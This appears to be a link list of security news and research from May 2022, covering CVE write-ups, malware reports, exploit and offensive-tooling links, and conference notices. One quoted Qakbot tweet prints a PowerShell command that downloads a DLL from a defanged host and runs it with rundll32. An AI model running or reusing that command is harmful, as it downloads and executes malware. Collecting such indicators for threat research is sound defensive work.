DEA Investigating Breach of Law Enforcement Data Portal – Krebs on Security
https://krebsonsecurity.com/2022/05/dea-investigating-breach-of-law-enforcement-data-portal/
CVE-2022-21972: Windows Server VPN Remote Kernel Use After Free Vulnerability (Part 1) - Nettitude Labs
https://labs.nettitude.com/blog/cve-2022-21972-windows-server-vpn-remote-kernel-use-after-free-vulnerability/
404 Page not found | STAR Labs
https://starlabs.sg/blog/2022/05/new-wine-in-old-bottle-microsoft-sharepoint-post-auth-deserialization-rce-cve-2022-29108/
Cyber Security Training Events | SANS Institute
http://www.sans.org/u/1kWK
BPFDoor: Stealthy Linux malware bypasses firewalls for remote access
https://www.bleepingcomputer.com/news/security/bpfdoor-stealthy-linux-malware-bypasses-firewalls-for-remote-access/
bloodyAD and CVE-2022-26923 | Total Recall
https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html
CVE-2022-30525 (FIXED): Zyxel Firewall Unauthenticated Remote Command Injection | Rapid7 Blog
https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
Exploit for Active Directory Domain Privilege Escalation (CVE-2022-26923) · GitHub
https://gist.github.com/dmchell/478d83f369260bd4e4cd380712f6bb6e
How to Write YARA Rules That Minimize False Positives - Intezer
https://www.intezer.com/blog/threat-hunting/yara-rules-minimize-false-positives/
MalwareHunterTeam on Twitter: "There is a new version of WCry/WannaCry ransomware: "WanaCrypt0r 2.0". Extension: .WNCRY Note: @[email protected] @BleepinComputer https://t.co/tdq0OBScz4" / Twitter
https://twitter.com/malwrhunterteam/status/862946459376857088
Call For Papers - Wild West Hackin' Fest in Deadwood
https://wildwesthackinfest.com/deadwood/cfp/
3xp0rt on Twitter: "#Malware #Yashma #Ransomware A paid version of Chaos Ransomware yashma-encrypt.exe: https://t.co/eOTUzf3GqE https://t.co/2FafHpt3RZ read_it.txt: https://t.co/kKxDK0UFs5 BTC address: bc1qlnzcep4l4ac0ttdrq7awxev9ehu465f2vpt9x0 https://t.co/5QWUzkbeBt" / Twitter
https://twitter.com/3xp0rtblog/status/1517572032963174401
APT34 targets Jordan Government using new Saitama backdoor
https://blog.malwarebytes.com/threat-intelligence/2022/05/apt34-targets-jordan-government-using-new-saitama-backdoor/
iPhone Setup for Reversing and Debugging
https://naehrdine.blogspot.com/2022/05/iphone-setup-for-reversing-and-debugging.html
Rural Tech Fund on Twitter: "“The Cuckoo’s Egg: Tracking a Spy Through the Maze of Computer Espionage” by Clifford Stoll is a nonfiction masterpiece. The story is a first-person account of searching for a hacker while Stoll was working at the Lawrence Berkeley National Laboratory. After noticing a 75-cent 1/ https://t.co/Dd4j7Z7CYF" / Twitter
https://twitter.com/RuralTechFund/status/1524404922820792320
Where To Find Us | SpecterOps
https://ghst.ly/3vl6xtH
CVE-2022-23270 - Windows Server VPN Remote Kernel Use After Free Vulnerability (Part 2) - Nettitude Labs
https://labs.nettitude.com/blog/cve-2022-23270-windows-server-vpn-remote-kernel-use-after-free-vulnerability/
REcon on Twitter: "Recon 2022 Talk selection have been released. https://t.co/WxAPSuMXrH. Talk description and schedules will be published soon." / Twitter
https://twitter.com/reconmtl/status/1524823185102974978
Rasta Mouse on Twitter: "BlockDLLs and PPID Spoof working with @CaptMeelo's NtCreateUserProcess code. Thanks @passthehashbrwn for the tips. https://t.co/dxYbh9WPsf" / Twitter
https://twitter.com/_RastaMouse/status/1524761507782873088
PPID Spoofing & BlockDLLs with NtCreateUserProcess - Offensive Defence
https://offensivedefence.co.uk/posts/ntcreateuserprocess/
‘I lost my life savings’: Terra Luna cryptocurrency collapses 98% overnight | The Independent
https://www.independent.co.uk/tech/terra-luna-ust-crypto-price-crash-b2076655.html
MalwareBazaar | SHA256 df0d696632c25d7dc0f18b43ee985e7e4b4b7b7efb79ea0672d07e581c9bd561 (BumbleBee)
https://bazaar.abuse.ch/sample/df0d696632c25d7dc0f18b43ee985e7e4b4b7b7efb79ea0672d07e581c9bd561/
Cisco Talos Intelligence Group - Comprehensive Threat Intelligence: Bitter APT adds Bangladesh to their targets
https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html
Joint statement by the President of the Republic and Prime Minister of Finland on Finland's NATO membership - Presidentti
https://www.presidentti.fi/en/press-release/joint-statement-by-the-president-of-the-republic-and-prime-minister-of-finland-on-finlands-nato-membership/
proxylife on Twitter: "#Qakbot - AA - url > .zip > .lnk > .ps > .dll powershell.exe Invoke-WebRequest hxxps://penofpurpose.com/7FSBEwva7VvZ/y.png -OutFile c:\file140.dll;Start-Process rundll32 c:\file140.dll,DllInstall https://t.co/JyocB7ljRs IOC's https://t.co/zpuFMjgbEv https://t.co/G6ScRvwyxG" / Twitter
https://twitter.com/pr0xylife/status/1524771398975213568
Coinbase admits users may lose crypto if exchange goes bankrupt | Fortune
https://fortune.com/2022/05/11/coinbase-bankruptcy-crypto-assets-safe-private-key-earnings-stock/
SEKTOR7 Institute
https://institute.sektor7.net/?coupon=ICE-SAINTS-19H
Nobel Peace Prize-Nom Entertainer Cynthia Basinet Highlights Big Tech & Big Media Abuse To The UN - YouTube
https://youtu.be/IUqg9SMWIxA
GitHub - warhorse/warhorse
https://github.com/warhorse/warhorse
CVE-2022-0573: Artifactory Vulnerable to Deserialization of Untrusted Data - JFrog - JFrog Documentation
https://www.jfrog.com/confluence/display/JFROG/CVE-2022-0573%3A+Artifactory+Vulnerable+to+Deserialization+of+Untrusted+Data
𓃭𓇋𓊃𓄿𓁐 on Twitter: "it is with a heavy heart that i must inform you it is once again time to update your threat model: https://t.co/b8t68med0w" / Twitter
https://twitter.com/mycoliza/status/1524507221618425856
GitHub - NVIDIA/open-gpu-kernel-modules: NVIDIA Linux open GPU kernel module source
https://github.com/NVIDIA/open-gpu-kernel-modules
#1350653 Remote kernel heap overflow
https://hackerone.com/reports/1350653